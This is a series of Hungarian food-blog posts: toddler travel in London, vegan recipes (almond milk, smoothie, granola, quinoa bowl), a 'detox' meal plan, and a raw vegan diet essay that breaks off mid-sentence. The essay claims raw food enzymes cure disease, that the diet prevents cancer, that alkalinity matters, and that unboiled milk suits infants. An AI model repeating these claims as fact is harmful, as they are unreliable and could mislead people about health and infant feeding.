hanem nekünk is. 6. Gyerekbarát helyek Londonban A legtöbb helyen van etetőszék, néhány helyen pedig még extrát is adnak, ha babával, gyerekkel érkezünk. Megemlítem Jamie Oliver Recipease nevű főzőiskoláját-éttermét. Ádi kapott színezőt zsírkrétákkal, színes ceruzákkal. Noha ő még kicsi az ilyenhez, az én segítségemmel nagyon élvezte a színezést (és a zsírkréták földre dobálását ). Sajnos itt pelenkázó nem volt. A Pret A Manger nevű kávézó láncolat viszont teljesen meglepett, különbözik a többi hasonló kávézó láncolattól. Az egyik üzletükben találkoztunk egy magyar fiúval, Gáborral, aki már menedzser és őt faggattam a kávézóról. Kiderült, hogy szinte minden üzletükhöz tartozik saját konyha és helyben készítik el az ételeket, így frissen kerülnek ki a polcra. A kávé és a tea tényleg bio minősítésű. A sütemények is háziak, egy néni készíti – most már nem a konyhájában, hanem az üzemében – csak és kizárólag a Pret A Manger részére. Van pelenkázójuk és ezenkívül a gyerekek ingyen kapnak babyccino-t, ez olyan baba cappuccino féle, természetesen kizárólag habosított tej (növényi tejből is lehet kérni!!!) egy vékony csík kakaóporral meghintve. Ádinak nagyon ízlett. 7. Repülés Olyan járatot kerestünk, ami nem túl korán és nem is túl későn este indul, érkezik, így kényelmesen a napi rutinba iktattuk a repülést. Kicsit izgultunk, hogy Ádi hogyan fogja magát érezni fel- és leszálláskor, de igazából meg se kottyant neki. Nem tudjuk, hogy mit érzékelt belőle, noha mondtuk neki, hogy fent vagyunk a levegőben, egy repülőn, amit ő imád nézni lentről a homokozóból. Több hasonló korú babával utaztunk oda- és visszafele is, így láttuk, hogy mindegyikőjüknél az első 20-30 perc nyugis, utána kezdődik a mocoroghatnék. Vittünk enni- és innivalót, amivel le lehetett kötni újra néhány percre, majd jött a sétálás, szemügyre vettük az összes nyomógombot és, ha már nagyon unalmas volt minden, akkor anya elővarázsolt egy új apró játékot. Az utazás előtt vettem néhány apróságot (könyv, baba puzzle, stb.), amik nem helyfoglalóak és az újdonság varázsával hatnak és segítségükkel újabb 10-15 perc nyugalom nyerhető. Egyébként, ahogy a bejegyzés elején is írtam, Ádi nagyon jó fiú volt, szóval az első nagy utazásunk mindenképpen pozitív élmény… bátran nézünk elébe a következőknek! Várom a ti tapasztalataitokat, ötleteiteket! Írjátok meg kommentben, ha tudjátok a tutit! ***** Majmos előke és kistányér: Monkie.
Házi vaníliás mandulatej
2014. július 5. Zizi kalandjai
Van a kedvenc mandulásunk, lekvárosunk a biopiacon, Imre, hát ő olyan mandulatejet tud csinálni, amilyet eddig sehol nem kóstoltam: sűrű, krémes, drapp színű, ha kinyitod az üveget, megcsap a marcipán illata. És olcsóbb, mint a külföldi társai (amelyek hígabbak és fehér színűek)! Meg is beszéltük Imrével, hogy ellátogatunk az üzemébe, megnézzük, hogyan is készíti ezt a fantasztikus mandulatejet, na és persze a mandulavajat, ami szintén a legjobb a hazai piacon, amit eddig ettem (ár-érték arányban). Ez a recept sima szűrt mandulatej, ami nem olyan, mint Imréé (azt csak ipari körülmények között lehet előállítani). Vaníliával fűszereztem, ízlés szerint édesíthető (én nem tettem bele semmit) és málnával vagy szederrel vagy őszibarackkal összeturmixolva isteni finom smoothie készíthető belőle! Rövidre is fogom a bejegyzést, mert már éjszaka van és még ezután pakolok a hétvégi kirándulásunkra, megyünk az Everness Fesztiválra, mert I.-t meghívták, hogy adjon elő. Egy éjszakára megyünk, de gyerekkel ez olyan, mintha egy hétre mennénk. :) Pakolni elég ruhát (minden időjárásra felkészülve, még akkor is, ha megnézzük az előrejelzést), kaját, pelenkát, játékot… szóval nem fogok hamar lefeküdni. Mindenkinek jó pihenést a nyári melegnek ígérkező hétvégére! Gondolom, ti se fogtok sokat ülni a gép előtt, de ne felejtsetek el hétfőn visszanézni a blogra, akkor hirdetem ki a nyereményjáték szerencsés nyertesét… szóval, aki még nem játszott a szakácskönyvért, megteheti vasárnap éjfélig! Házi vaníliás mandulatej Hozzávalók: - 200 g hántolt (fehér színű) mandula, egy éjszakára vízbe áztatva - kb. 1000 ml víz - 1 vaníliarúd kikapart magjai - juharszirup / méz / agavé vagy rizs szirup A beáztatott mandulát szűrjük le és tegyük a robotgépbe, öntsük fel a vízzel és dolgoztassuk a robotgépet addig, amíg a mandulát teljesen pépesre aprítja és kapunk egy sűrű folyadékot. Gézen vagy apró lyukú szűrőn öntsük át és az így kapott mandulatejbe tegyük bele a vaníliát, keverjük el és töltsük üvegbe. Néhány napig eláll a hűtőben. A gézen, szitán megmaradt mandula darálékot beletehetjük a reggeli kásánkba vagy egy tálcára téve megszáríthatjuk és belesüthetjük muffinokba, süteményekbe.
Meggyes-epres turmix
Gitta a blogján épp most tett fel hasonlót. (Ja, megírtam félig, csak nem postoltam. Vagy két hete volt.) Örülök, hogy látok bejegyzéseket, mert a régi arcok valahogy elmaradoztak. Pont a napokban gondolkoztam ezen, és nézegettem meg az I. VGB (vegablogger) találkozón készült fényképeket. Szilda, Vajaspánkóék, KatAnyaka, Siccike, VegaVera, Napmátka Ildikó, Dulmina, Lét-tudatos Reni... és még persze sokan mások, de most ez jutott eszembe. Egészen más jellegű volt a légkör, sokat reagáltunk egymás bejegyzésére, valahogy mostanában ez pl. elveszett. Még a "nagymenő" blogokon is újabban olykor alig-alig árválkodnak megjegyzések, ami meglepő. Persze nekem is kevesebb lett az időm, ahogy változott a világ körülöttem, és megjelent a kis mazsola az életemben, megértem, ha valaki azt mondja, azt sem tudja hová kapjon. Mégis javaslom, hogy egy picit nézzen körbe magánál, gondolja végig a napjait, mert (a tapasztalat mondatja velem) olykor tudattalanul telik-telik az idő nagyon haszontalan dolgokkal, neten nézelődéssel, tévébámulással, pletyizéssel. Nekem is ritkán jut eszembe, hogy az idő is egy ajándék, amellyel ugyanúgy el kell számolni a Jó Istennek, mint az egyéb képességeinkkel, hogy jól kamatoztattuk-e vajon... (Mt 25,14-30) Szükségtelen magyarázkodásba kezdeni, annak semmi értelme, inkább két mondatban kérj föntről segítséget. Visszakanyarodva a turmixhoz, tavaly is készült kicsit másképp, nagyon finom, és pofonegyszerű. Csak türelem legyen a meggy magvaláshoz. :) Hozzávalók: 1/2 kg meggy 20 dkg eper 2 marék kesudió / mandula vanília pár csepp sztívia / méz A meggyet kimagozzuk, az epret lecsumázzuk. A kesudiót finomra turmixoljuk 2 dl vízzel és egy darab vaníliával, azután a többi hozzávalót is beletesszük. Ízlés szerint adunk hozzá még némi vizet. Candidások kesudió helyett mandula és szezámmag keverékét használják sűrítésül. És fogyasszanak hozzá kölesgombócot.
Tavaszi méregtelenítés. Harmadik-kilencedik nap
A felvezető szakasz napjai megegyeznek az előzőekkel. Mármint a folyadék fogyasztás és a táplálékkiegészítők vonatkozásában. Figyeljünk a megfelel folyadékbevitelre!! Ebben a blogban ötleteket adok arra vonatkozóan, hogy milyen ételeket készítsünk, hogy azok táplálóak, gluténmentesek és vegán legyenek. 3.nap A reggeli nekem minden esetben gyümölcs , a páromnak viszont kását főzök. Ez lehet zab-, köles-, kukorica-, vagy rizskása . De készíthetünk gluténmentes gofrit eperöntettel vagy hajdinás palacsintát is. Ebédre egy olyan ételt ajánlok most, amit a csapatépítőn Betty készített. Nagyon gyorsan elkészíthető, és finom. Batátás-zöldborsó ragu , melyet kölessel készítettem, de akár fokhagymás kukorica puliszka vagy quinoa is mehet hozzá. Vacsorára "tejbe"rizst készítettem eperrel . 4.nap Én nagyon szeretm a csicseriborsót, gyakran kerül az ételekbe. Az emésztése sokkal könnyebb más hüvelyeseknél. A mai nap ebédjébe is került. Csicseriborós zöldséges kölest készítettem zöldsalátával . Vacsorára quinoa saláta készült. 5.nap Nemrég, mikor Pesten voltam egy nagyon finom zöldborsó krémlevest ettem. Azt iziben el is készítettem, így a mai ebéd levese mentás zöldborsókrém leves lett. A második fogás karalábé pörkölt volt tört burgonyával és egy nagy adag zöldsaláta került mellé. Vacsorára egy egyszerű gluténmentes gofri készült eperöntettel . 6.nap Nagyon szeretem a krémleveseket, az elkészítésüket sem viszem túlzásba. Egyszerűen megfőzöm, még tejszínt sem teszek hozzá. Így készült a brokkoli krémleves is. A második fogás chilis bab volt, melyhez kölest főztem. Vacsorára készítettem egy gluténmentes lepényt, melyet megtöltöttem sok-sok zöldséggel . Olyan pita jellege volt. 7.nap Már nyugodtan elkezdhetnénk a léböjtöt, de elhalasztjuk pár napot, hogy hétköznapra essen az. Ezért a mai ebéd batátás lencsefőzelék volt pirított hagymával . Mellé barna rizst főztem. Vacsorára fűszeres köleskása volt. nagyon egyszerű, gyorsan elkészül. Szokásomhoz híven egy nagy adag zöldsalátával kínáltam. 8.nap Ez az utolsó előtti nap a lébőjt felvezetésére. Az ebéd korhelyleves volt, mellé magyaros fűszerezésű ZÖLDségragu készült barna rizzsel . Vacsorára epres kölesgombóc készült a gyerekek nagy örömére. 9.nap Ez a nap felkészülés a léböjtre, Ezért csak nyers ételeket ettünk. Délelőtt a cseresznye és az eper volt a sláger, ebédre cukkini spagetti készült egy kis paradicsomszósszal . Vacsorára egy nagy adag zöldsalátát ettünk. Holnap léböjtözünk...
Kókuszos mandulás granola
2014. május 14. Zizi kalandjai
Hónapok óta szinte majdnem minden reggel zab- vagy rizspehely kását eszünk reggelire. Először is a zab tejserkentő, tehát jól jött, amikor az anyatej serkentése volt a cél. Télen jól jön a melegítő hatása is, rengeteg mindennel fel lehet dobni (friss és szárított gyümölcsök, magok), meg finom, szóval mi nem untuk még meg. Sőt, Ádi sem, aki többnyire kását reggelizik úgy, ahogy mi. Aztán eszembe jutott a granola… hogy már milyen régen ettünk és megkívántam. Talán váltani kellene a kását valami ropogósra – gondoltam. Eddig kétfélét készítettem, egyszer sütőtököset, egyszer pedig cukormenteset. Most az itthon talált alapanyagokból dobtam össze egy változatot és azt kell mondanom, ez lett a legfinomabb. Annyira finom, hogy most is, amikor ezt a bejegyzést írom, granolát ropogtatok és majszolom hozzá a 70%-os étcsoki kockámat. Mennyei éjszakai desszert! Ha így folytatom, hamarabb el fog fogyni, mint gondoltam. Ki is találtam, hogy néhány hét múlva ajándékba is elkészítem, amikor Londonba utazunk és a vendéglátóinknak házilag készített gasztro ajándékot szeretnék vinni + valami finom magyar alapanyagot (például őrölt pirospaprikát Szegedről). Szóval egy kis kihagyás után újra repülőre ülünk, I. és én sokadszorra, azonban Ádinak ez lesz az első repülőútja. Kicsit izgulok, de remélem tetszeni fog neki. Percek alatt összekeverhető a granola, majd a sütőben kb. 15-20 perc alatt megsül. Nagyon gyorsan készen lesz, érdemes kipróbálni. Tudjuk, hogy pontosan milyen alapanyagok vannak benne és saját ízlésünk szerint édesíthetjük. Én kevés juharszirupot kevertem hozzá, de ez lecserélhető mézre, rizsszirupra vagy bármilyen más folyékony édesítőszerre, de akár el is hagyhatjuk és akkor teljesen cukormentes lesz. Az alapanyagokat ízlésetek és a kamrában található magok alapján variálhatjátok… végtelen sok lehetőség rejlik a granolában. Én ilyen vegán citromos joghurtba kevertem bele, de növényi tejjel és gyümölcsökkel (eper, málna) is kiváló! Kókuszos mandulás granola Hozzávalók: - 2 bögre zabpehely - 1/2 bögre napraforgó mag - 1/3 bögre tökmag - 1 bögre mandula, kicsit felaprítva - 1/2 bögre kókuszreszelék - 1/3 bögre juharszirup - 1/2 teáskanál só - 4 evőkanál kókuszzsír (szobahőmérsékletű) Melegítsük elő a sütőt 175 fokra. Egy nagy tepsit béleljünk ki sütőpapírral. Egy tálban keverjük össze a száraz alapanyagokat: zabpehely, napraforgó mag, tökmag, mandula, kókuszreszelék, só. A végén adjuk hozzá a juharszirupot és a kókuszzsírt és jól keverjük el. Borítsuk rá a tepsire és kanállal egyengessük el, hogy mindenhova egyformán jusson. Süssük kb. 6-8 percig, keverjük át, majd süssük újabb 8-10 percig, amíg aranybarna lesz (ellenőrizzük folyamatosan, mert sütő függő, hogy milyen hamar lesz kész). Üvegben/dobozban tartva hetekig eláll. Bár nem fog addig tartani, ezt garantálom!
Megvan az év gyógynövénye
A Magyar Gyógyszerésztudományi Társaság (MGYT) Gyógynövény Szakosztálya az orvosi citromfüvet választotta a 2014-es év gyógynövényének.
A házikoszt az új őrület
Ha a lisztes főzelékek és az unalmas pizzák helyett szívesebben ennénk valami hazait, akkor van megoldás: egy új, magyarok által készített telefonos alkalmazás összeköti az éhes embereket és a főzni tudókat.
Vegán tavaszi zöldséges quinoa tál citromos joghurt szósszal
2014. április 16. Zizi kalandjai
Nagyon vágyom már a késő tavaszi, kora nyári napfény érlelte friss ízekre: zöldborsóra, spárgára, új répára, új burgonyára, na és persze a gyümölcsökre: eperre, szederre, málnára, ribizlire. Gondolom ezzel ti is így vagytok. Spenótot és sóskát már tudtunk venni a piacon, és noha drága, kétszer vettünk már magyar spárgát is, először zöldet, múlt hétvégén pedig fehéret. Tudom, sokan a zöldet szeretik, meg talán az is terjedt el jobban hazánkban, de én fehér spárgán nőttem fel. Emlékszem még, hogy gyerekkoromban a hobbi kertünkben elvetettük a fehér spárga palántákat és bizony három évet kellett várni, hogy teremjen. Onnantól kezdve, folyamatosan terem és fogyasztjuk is. Abban az időben még nem lehetett spárgát kapni az Áfész ABC-kben vagy zöldségeseknél, de mi nyáron hetente ettünk valamilyen spárgás ételt (néha már a fülünkön jött ki, de anyáék biztosítottak róla, hogy ez egészséges és meg kell ennünk ). És igen, a fehér spárga betakarítása munkás. Ott térdelünk a buckák felett, kiássuk kézzel a spárgákat (laza homokos földön termeszthető a legjobban!), aztán, ha leszedtük, vissza kell “építeni” a buckát, hogy néhány nap vagy egy hét múlva újra szüretelni tudjunk. A fehér spárgát meg szoktuk hámozni, ami nekünk túl macerás feladat volt, így drága jó nagymamám – akinek bőven volt ideje – volt a család első számú spárga pucolója. Manapság ránk hárul ez a feladat… de annyira szeretjük a spárgát, hogy bevállaljuk. A recept inspirációja Sarah-tól származik és tényleg gyorsan összedobható. Amikor elkezdtem vasárnap ebédet főzni, még nem tudtam, hogy bejegyzés lesz belőle. Ahogy készítettem, rájöttem, hogy ez megint egy olyan recept, amit akkor eszünk, ha gyorsan kell főzni és azt használjuk fel hozzá, ami a hűtőnkben és a kamránkban van. Változtattam néhány dolgot a recepten, először is vegánosítottam (szójajoghurtot használtam az öntethez, de sima joghurt is használható, akkor lakto vegetáriánus lesz az étel), kicsit másképp fűszereztem és olyan zöldségeket használtam fel hozzá, ami volt itthon. Bátran kísérletezzetek ti is és variáljátok saját ízlésetek és alapanyag készletetek szerint! Tápláló, laktató, friss étel! Vegán tavaszi zöldséges quinoa tál citromos joghurt szósszal Hozzávalók 2 főre: A tálhoz: - 1 bögre quinoa - 1 csokor (10-12 szál) fehér spárga, meghámozva (zöld spárga is használható) - 1/2 bögre zöldborsó (friss vagy fagyasztott) - 1 db érett avokádó, felkockázva - 2 szál újhagyma, felkarikázva - 1/2 bio citrom reszelt héja - friss csíra (bármilyen fajta) - olívaolaj - só, bors Az öntethez: - 1 bögre szójajoghurt - 1 gerezd fokhagyma, felaprítva - 2-3 evőkanál frissen facsart citromlé - 1 evőkanál olívaolaj - só, bors (A recepthez használt bögre 250 ml-es.) A quinoát tegyük egy lábasba, öntsük fel két bögre vízzel, sózzuk, majd forraljuk fel, vegyük takarékra a lángot és főzzük 10-15 percig, amíg megpuhul. Az utolsó 5 percben beletettem a fagyasztott borsót, fedőt tettem rá és hagytam a gőzben a borsót is megfőni (friss borsónak kicsit több idő kell). Reszeljük bele a fél citrom héját és tegyük félre. Hevítsünk egy evőkanál olívaolajat egy serpenyőben, tegyük bele a spárgákat és pirítsuk meg. Közben forgassuk, hogy minden oldalukon megpiruljanak és jól megpuhuljanak. Sózzuk, borsozzuk. Az öntethez keverjük össze a hozzávalókat egy tálkában. Tálaláshoz szedjünk zöldborsós quinoát a tányérunkra, tegyük mellé a spárgákat, a felkockázott avokádót, felkarikázott újhagymát, csírát. Locsolhatjuk meg a joghurtos öntettel, és esetleg még olívaolajjal és citromlével. Na és az elmaradhatatlan fotóbomba! Ádi kéz betámad… (a csírát el is majszolgatta). ***** Húsvét közeledtével egy kis csokor a blogomról összegyűjtött receptekből és más blogokon talált receptekből, hogy legyen honnan inspirálódnotok! Foszlós kalács és briós Fokhagymás kalács Gyömbéres répatorta Tojáslikőrös fagylalt Tojáslikőrök Görög húsvéti keksz Répafelfújt Retekkompót Párolt retek Sárga túró Spárga torta Zöld spárga parfé Töltött tojás tavaszi zöldfűszerekkel (angol) Vegán zöld spárga mártogatós (angol) Vegán spenótos mártogatós (angol) Csípős répa mimoza koktél (angol) Nyers répasüti citromos kesudió krémmel (angol) Avokádós töltött tojás (angol) Húsvéti tojásos kalács (angol)
Családi menü tudományos megközelítésben. 2.rész. Nyers, vegán menü
2014. március 18. Éltető ételek
A táplálkozásról, az egészséges táplálkozásról mostanában sok szó esik. Az életmódmagazinok és a média napi szinten bombázzák az embereket egymásnak ellentmondó táplálkozási irányzatokkal, táplálkozási tanácsokkal, amelyekkel egészségesek és karcsúak lehetünk. Ugyanakkor a gyártók milliárdokat keresnek azzal, hogy azokat az élelmiszereket vásároljuk meg, és azokat a gyógyszereket szedjük betegségeinkre, amelyeket ők gyártanak és reklámoznak. A mai rohanó világban már nincs idő ételeink megtermelésére és elkészítésére, az ipar felajánlja erre a megoldást. Vajon mi a helyes út ahhoz, hogy javítsuk egészségünket, és idős korunkat ne gyógyszerfüggőségben, vegetálva éljük? A táplálkozás az emberek többségének csak élvezetet és a szükségletek kielégítését jelenti, de nem fontos számukra az, hogy a táplálék táplálja is a sejteket. Szókratész is ezt mondta: ,,Nem azért élünk, hogy együnk, hanem azért eszünk, hogy éljünk. Hát ez ma már nincs így. A túlevés, a kiegyensúlyozatlan és elégtelen táplálék egészségkárosodáshoz és ún. táplálékfüggő betegségek kialakulásához vezet. Persze az emberek nem látják meg a kapcsolatot a helytelen táplálkozásuk és betegségeik között. Hosszú évekig, évtizedekig tartó helytelen táplálkozás következtében felmerülő betegségekre csak annyit mondanak: ,,korral jár. De ez nincs így jól. Vannak olyan népek, ahol csak természetes ételeket fogyasztanak, és nem ismert náluk a civilizációs betegség. A táplálékok megbetegíthetnek, de meg is gyógyíthatnak minket. Egy kis történelem... Az evolúció évmilliói alatt az emberek vadászó-gyűjtögető életmódot folyattak. Kb. 10 ezer évvel ezelőtt a tűz használata gyökeresen megváltoztatta az emberek étkezési szokásait. A mezőgazdaság meghonosodása révén az emberek egyre jobban elszakadtak a természettől. A demográfiai növekedés szükségessé tette az élelmiszer termelést, az állatok tartását. A megművelt földek köré falvak, városok létesültek. A nagy felfedező utak (pl. Amerika felfedezése) révén megjelentek az első exporttermékek is. Az újvilágból behozott növények a kukorica, krumpli, paradicsom, bab, dohány, kávé, kakaó, nádcukor volt. Ezek után a földeket rabszolgákkal műveltették meg. A XVIII. században az élelmiszer termelés ipari méreteket öltött. Megjelentek az új szereplők az élelmiszergyártás színpadán, pl. a műtrágyák, rovarirtók, tartósítószerek, ízfokozók. Sajnos ezzel az ételeink egyre értéktelenebbé és károsabbá váltak. A jóléti társadalmakban ötvenezerféle étel közül lehet választani, de valósággal vadászni kell az életerőt serkentő, minőségi táplálékokra. Az elmúlt századokban több olyan táplálkozási irányzat jött létre, amelynek a célja az egészség fenntartása és megőrzése. Ezeket az irányzatokat nem lehet egy lapon említeni a különböző kúrákkal, diétákkal. Ugyanis ezek az irányzatok a régi időkből (Keletről vagy az ókorból) származnak, vagy a XIX század végén, XX. század elején Európában fejlődtek ki. Egyre fokozottabb érdeklődés észlelhető ezek iránt, mivel a jelenlegi táplálkozási szokásaink számos betegséggel társulnak. Ezen irányzatok többsége vegetáriánus, és nagy figyelmet szentelnek az élelmiszerek minőségére is. Nyerskoszt mozgalom úttörői A nyers vegán étrend a vegetáriánus étkezés egy vállfaja, mely szinte teljes mértékben vagy akár kizárólag nem hőkezelt növényi élelmiszerekből áll. A XIX. század fő résztvevője dr. Maximilian BIRCHER-BENNER (1867-1939) svájci pszichológus és táplálkozáskutató főként a müzli felfedezéséről ismert, bár az ő találmánya különbözik a ma ismert müzliktől. A Bircher-Benner-féle müzlikbe minden alapanyag frissen kerül bele. Elkötelezett híve volt a zöldségben, gyümölcsben és magvakban gazdag táplálkozásnak, ugyanis észrevette, hogy mentális betegséggel küzdő páciensei is sokkal jobban gyógyulnak, ha az általa összeállított étrend szerint táplálkoznak. Egyébként én is aszalok müzlit, ami kiváló reggeli gyümölcspürével vagy gabonatejjel. Ezt bárki elkészítheti, akár sütőben is, odafigyelve a hőfokra, hogy élő maradjon. A nyers ételeket napfény-ételeknek nevezte, melyeket nem rontottak el melegítéssel vagy kilúgozással. Amikor a csecsemőket sterilizált, forralt tejjel táplálták, sok csecsemő halt meg skorbutban. Rájöttek arra, hogy a kipréselt friss alma, narancs, sárgarépa leve, vagy a friss, forraratlan tej gyógyítja a betegséget. Ez bizonyítja azt, hogy végzetes hiba a csecsemőket kizárólagosan főtt, denaturált anyagokkal táplálni. Ez a nézet akkora felháborodást váltott ki kollegái körében, hogy a zürichi orvosszövetség kizárta soraiból. Ezért kénytelen volt magánklinikát nyitni, ami ma is sikeresen működik Zürichben. Werner KOLLATH professzor, orvos és táplálkozáskutató (1892-1970) nagy hangsúlyt fektetett a minél kisebb mértékben feldolgozott élelmiszerek fogyasztására. Állatokon végzett kutatásaival bizonyította, hogy legelőnyösebben a ,,nyerskoszt hat a szervezetre. Hangsúlyozta az ökogazdaságból származó ételek fontosságát is. Az oldalon is ismert Kolláth reggeli az ő nevéhez fűződik. Guy-Claude BURGER hangsúlyozta az ösztönterápiát , mely során az élelmiszereket fogyasztás előtt szaglással kell megvizsgálni, hogy a szervezet kívánja-e. Az ösztönös elutasítás révén nem érzünk kellemes illatot, sem kellemes ízt. Viszont nem utasítja el a nyers húst, halat, a tenger gyümölcseit és a nyers tojást sem. Hát, az én ösztönöm alapból elutasítja a nyers húst, bár emlékszem arra, hogy gyerekkoromban ettünk nyers tojást cukorral kikeverve. De mindenesetre az biztos, hogy amíg az étel tartalmazza az enzimjeit (akár gyümölcs, akár hús), az a szervezetnek csak jó lehet. A múlt század elején a nyers tejet gyógyításra is használták! BICSÉRDY Béla (1872-1951) fiatal korában szélsőséges életmódot folytatott, mely következtében gyógyíthatatlan betegséget szerzett. 28 éves korában áttért a vegetáriánus nyers kosztra, mellette sokat foglalkozott a testi erőnlét fejlesztésével. Élet és táplálkozásfilozófiájának alapja Mózes 1. könyve, 1.fejezet 29.verse: ,,Aztán azt mondta az Isten: nézzétek, néktek adok minden növényt az egész Földön, amely magot terem és minden fát, amely magot rejtő gyümölcsöt érlel, hogy táplálékotok legyen. A Bicsérdyzmus lényege tisztán gyümölcsevés, a nyers táplálék kizárólagos fogyasztása. Rendszeresen böjtölt, tanításaiban kitért a mozgásra, légzésre, fürdésre, napozásra, pihenésre, meditációra. A mai kor képviselője Victoria BOUTENKO, akinek történetét ajánlom elolvasára mindenkinek. Egy orosz családról szól, akik 1989-ben az USA-ba költöztek. Victoria az amerikai étrendnek köszönhetően 2 év alatt 45 kg-ot hízott, a fia cukorbeteg lett, és a férje sem mondhatta el magáról, hogy egészséges. Szóval egyik napról a másikra áttértek a nyers étkezésre. 11 évig nagyon jól érezték magukat, majd kezdték úgy érezni, mintha valami hiányozna a táplálkozásukból. És ekkor lett figyelmes Victoria a zöld levelekre, amelyek csak kis mennyiségben voltak részei az étkezésüknek. Megfigyelte a csimpánzok táplálkozását, amely során kiderült, hogy azok étrendjének a gerincét a gyümölcsök és a zöld levelek tették ki, és csak kis mennyiségben fogyasztottak magvakat növényszárakat, fakérget és rovarokat. Gourmet nyersevők Fő táplálékuk a klorofillban gazdag zöld levelek, gyümölcsök, zöldségek, csírák, olajos magvak . A nyersevők törekednek arra, hogy a hagyományos ételekhez hasonló ételkompozíciókat készítsenek, amik legalább kinézetben hasonlítanak a megszokott ételekhez. Sok nyersevő azonban a teljes értékű szénhidrátok helyett/mellett sok olajos magokat is fogyaszt (zsírt), amik jelentősen megterhelik a gyomrot. Én nem készítek olyan tortát, aminek a tésztája dió, a krémje kesudió, és a tetején még kókuszolaj is van. Törekszem arra, hogy minél több friss gyümölcsöt tartalmazzon, emiatt a tortáim nem lesznek cukrászdai költemény, de annál egészségesebbek. Mindenesetre ha odafigyelünk az olajos mag bevitelre, akkor nagy baj nem lehet. A gyerekek anélkül esznek meg nagy mennyiségű gyümölcsöt, hogy tudnának róla, és még finom is. 80/10/10 A 811-et dr. Douglas GRAHAM fejlesztette ki, mely egy alacsony olajtartalmú, nyers vegán étrend . A számok a százalékos arányra utalnak, ami dr. Graham szerint az ideális étrendi összetételt jelöli: vagyis 80 százalék egyszerű szénhidrát, 10 százalék fehérje és 10 százalék zsír. A gyakorlatban ez azt jelenti, hogy naponta háromszor ajánlott nyers, édes gyümölcsöket fogyasztani kiegészítve délután egy nagy zöldsalátával, s mindezek mellé még magunkhoz vehetünk némi olajos magvakat is. Az ember képes sokféle táplálékon élni, de a legideálisabb étrend számára a gyümölcs. Az édes gyümölcsök mellett fogyasztják a sokmagvú gyümölcsöket is, amelyeket általában zöldségként eszünk. Ilyen például a paradicsom, uborka, paprika, cukkini, padlizsán. Érdekesség, hogy a gyümölcsök legnagyobb százalékban épp 811-es elosztásban vannak a különböző tápanyagok. Az ösztönterápia is előtérbe kerül, hiszen mit kívánunk jobban? Egy finom érett barackot, netán egy búzaföldön lengedező kalászt vagy egy marhacsordát. Melyik gondolatára fog beindulni a nyáltermelés? Hát nekem a barackra. Minden elfogyasztott táplálékot a maga természetében ajánlja, az aszalás, préselés sem elfogadható, mivel az magas szintre emeli a gyümölcs cukortartalmát. Mivel ezek a gyümölcsök alacsony kalória értékűek, (pl. egy banán 105, fejes saláta 39), így többet kell enni belőlük, ha nem a fogyás a célunk. Ezért egy átlagos nap során (kb. 2000 kalóriával számolva) az étrend: - reggeli: 90 dkg mandarin (481 kcal) - ebéd: 90 dkg banán (807 kcal) - vacsora: papaya-ananász ital - 45 dkg papaya, 25 dkg ananász (286 kcal) ; Papaya-lime leves - 45 dkg papaya, 25 dkg római saláta, 30 ml lime (127 kcal) ; Narancs-kendermag saláta - 45 dkg saláta, 25 dkg narancs, 2 ek. kendermag (259 kcal) Ebből azért látszik, hogy nagy mennyiségű ételt kell megenni ahhoz, hogy elegendő kalóriával lássuk el a szervezetet, és napi min. 50-60 dkg zöld levél elfogyasztása sem semmi! Graham szerint a nyerskosztosok napi kalóriájának 60%-a zsír. A reggeli granolában dió van, a magfasírtban szintén olajos mag, és a desszert is sok esetben tartalmaz magokat. A salátába avokádo kerül, és egy kis ropogtatni való is lenmagot tartalmaz. Így valóban sok a napi zsír mennyiség, még akkor is, ha az természetes eredetű. Valamint ez a sok olajos mag elvonja a helyet a gyümölcsöktől és a zöld levelektől. Nyers növényi étrend előnyei - Tápegész: A növényi ételeket természetes formájukban fogyasztjuk, nem vonunk ki belőlük semmit, és nem is adunk hozzá semmit. - Magas napenergia-érték: A növények zöld festékanyagaik segítségével képesek felvenni a Nap energiáját a napfényből. Így az ember a növény közvetítésével veszi magához a napenergiát. - Enzimbőség: Az enzimeknek 3 osztálya létezik: anyagcsere enzimek a testünket működtetik; emésztőenzimek a táplálékunkat megemésztik és a nyers ételekben található táplálékenzimek, amelyek megkezdik az étel megemésztését. Az anyagcsere enzimek építik be a tápanyagokat a sejtekbe. Az emésztőenzimeket a hasnyálmirigy termeli (proteáz-fehérje, amiláz-szénhidrát, lipáz-zsír). A táplálékban megtalálható enzimek segítik az emésztést, hogy ne kelljen mindent a test emésztőenzimjeinek végezni. Ha a szervezetnek kevesebb emésztőenzimet kell előállítania, több ereje marad a test egészét működtető anyagcsere enzimek megtermelésére. Ezért is tud betegségeket gyógyítani a nyers növényi étrend. Ezek a táplálékenzimek hőre érzékenyek, ezért fontos minél több nyers gyümölcs és zöldség fogyasztása. - Vitaminbőség: Gazdagon tartalmaznak vitaminokat, ásványi anyagokat a szervezet számára hasznosuló formában. - Rostbőség: A jó bélműködés záloga a megfelelő rostbevitel, meggátolja a bélfalon a lerakódásokat, az erjedést-rothadást és a toxinfelszívódást. Jótékonyan hat a cukorbetegségre. Aki bőségesen fogyaszt rostot, nem kell tartania emésztőszervi megbetegedéstől. - Gyulladásgátló, antibiotikus hatás: A növényekben kisebb-nagyobb mennyiségben baktérium-, vírus- és gombaölő anyag van, az ún. fitoncida. Ezek a növény saját védekezését szolgálják a kórokozókkal szemben. A fűszernövények és hagymafélék különösen gazdagok ebben az anyagban: fokhagyma, vöröshagyma, medvehagyma, kakukkfű, levendula, majoranna, rozmaring. Hatásukra megemelkedik a T-lifociták száma, fokozódik az immunitás. - Megfelelő zsír- és koleszterin tartalom: a növényekben túlnyomórészt telítetlen zsírsavak találhatók, kedvezően hatnak a szív- és érrendszerre. - Antikarcinogén hatás: gátolja a rákos elváltozások kialakulását. - Lúgtöbblet: A lúgos közeg biztosítja az egészséges sejtélet számára az optimális körülményeket. Mindenkinek jó ez az étrend? A friss gyümölcs, zöldség, zöld levelek maga az ÉLET! Sajnos ma már mindent túlfinomítunk, túlédesítünk, túlsózunk, túlízesítünk, túlfőzünk. A természet megadja, amire szükségünk van, csak meg kell látni. Kb. 50%-os nyers étrend szerintem mindenkinek a hasznára válhat! A véleményem szerint (a keleti táplálkozási irányzatok szerint is) az ételeknek van hűtő és melegítő hatása. A nyers ételek hűtenek, a főtt/sütőben sült ételek melegítenek. A hiányos, száraz embereknek nagyobb mértékben ajánlott a párolt vagy főtt étel, az édes íz különösen jót tesz nekik, energiát, erőt adnak. Ugyanakkor a robusztus testfelépítésű, többlet- vagy túlmelegedett személyeknek meg szinte kötelező a nyers étkezés, hiszen hűtő, csillapító hatása van. A 811 hívei hangoztatják, hogy több hónapos nyers evés után elmúlik a fázósság. Én viszont annak a híve 